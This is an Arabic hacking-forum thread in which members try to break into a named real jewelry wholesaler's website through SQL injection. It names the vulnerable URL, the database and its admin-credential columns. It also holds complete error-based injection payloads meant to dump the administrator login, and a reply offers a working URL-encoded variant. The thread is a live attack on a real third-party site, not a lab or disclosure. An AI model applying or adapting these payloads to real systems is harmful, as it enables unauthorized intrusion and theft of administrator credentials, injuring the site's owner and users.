مشكلة بالحقن !! لو سمحتم مساعدة

freedom_h@ck3r · 03-05-2013, 08:05 AM

السلام عليكم ورحمة الله وبركاته

إخواني بحقن موقع دبل كيري وهذا رابط الثغرة
http://www.wholesale-indian-silver-j...view.php?id=74

القاعدة wisj_db_com
طيب انا استخرجت الجداول يلي بالقاعدة وبأحد الجداول يلي هو:
tbl_site_config
لقيت هذه الأعمدة:

'site_admin_login_id' 'site_admin_password'

تمام

عند الاستخراج بيظهر خطأ بيجنني !!

class="smallfont">اقتباس


	Cannot Run the Query: select * from tbl_products where products_categories_id=74 and(select 1 from(select count(),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_site_config.site_admin_l ogin_id as char),0x27,0x7e) FROM `wisj_db_com`.tbl_site_config LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a) and 1=1-- - order by products_id as following error is encountered...

class="smallfont">اقتباس


	Subquery returns more than 1 row

مع العلم هذا هو رابط الاستغلال يلي عم احقن فيه:

http://www.wholesale-indian-silver-jewelry.com/cat_view.php?id=74 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_site_config.site_admin_l ogin_id as char),0x27,0x7e) FROM `wisj_db_com`.tbl_site_config LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--

أرجوكم مساعدة لو سمحتم...

ومشكورين سلفاً

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC la;gm fhgprk !! g, slpjl lshu]m

freedom_h@ck3r · 03-06-2013, 11:13 AM

الله يخليكم يا إخوان ولله المشكلة كتير عم تواجهني مع انه الخطوات جميعها صحيحة

fantome195 · 03-06-2013, 01:11 PM

سلمات اسف يا غالي ما عندي اطلاع على ها نوع من الحقن بس انت يمكن اللي عندك مشكل

You have an error in your SQL syntax

freedom_h@ck3r معجب بهذا

aircrack -ng · 03-07-2013, 12:55 AM

كود:

http://www.wholesale-indian-silver-jewelry.com/cat_view.php?id=74%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,cast%28version%28%29%20as%20char%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1

fantome195 ,mido868 ,freedom_h@ck3r معجبون بهذا

freedom_h@ck3r · 03-07-2013, 05:10 AM

اقتباس

المشاركة الأصلية كتبت بواسطة aircrack -ng

كود:

http://www.wholesale-indian-silver-jewelry.com/cat_view.php?id=74%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,cast%28version%28%29%20as%20char%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1

تمام هي طريقة تانية لاستخراج البيانات المطلوبة ...بس انا هلأ فتت بالحيط..

بدي أعرف بالأساس ليش كان يطلع الخطأ الأولاني

ممكن توضيح عبد الصمد؟؟؟

" لا تعطني سمكة بل علمي كيف أصطادها " ههههه

mido868 معجب بهذا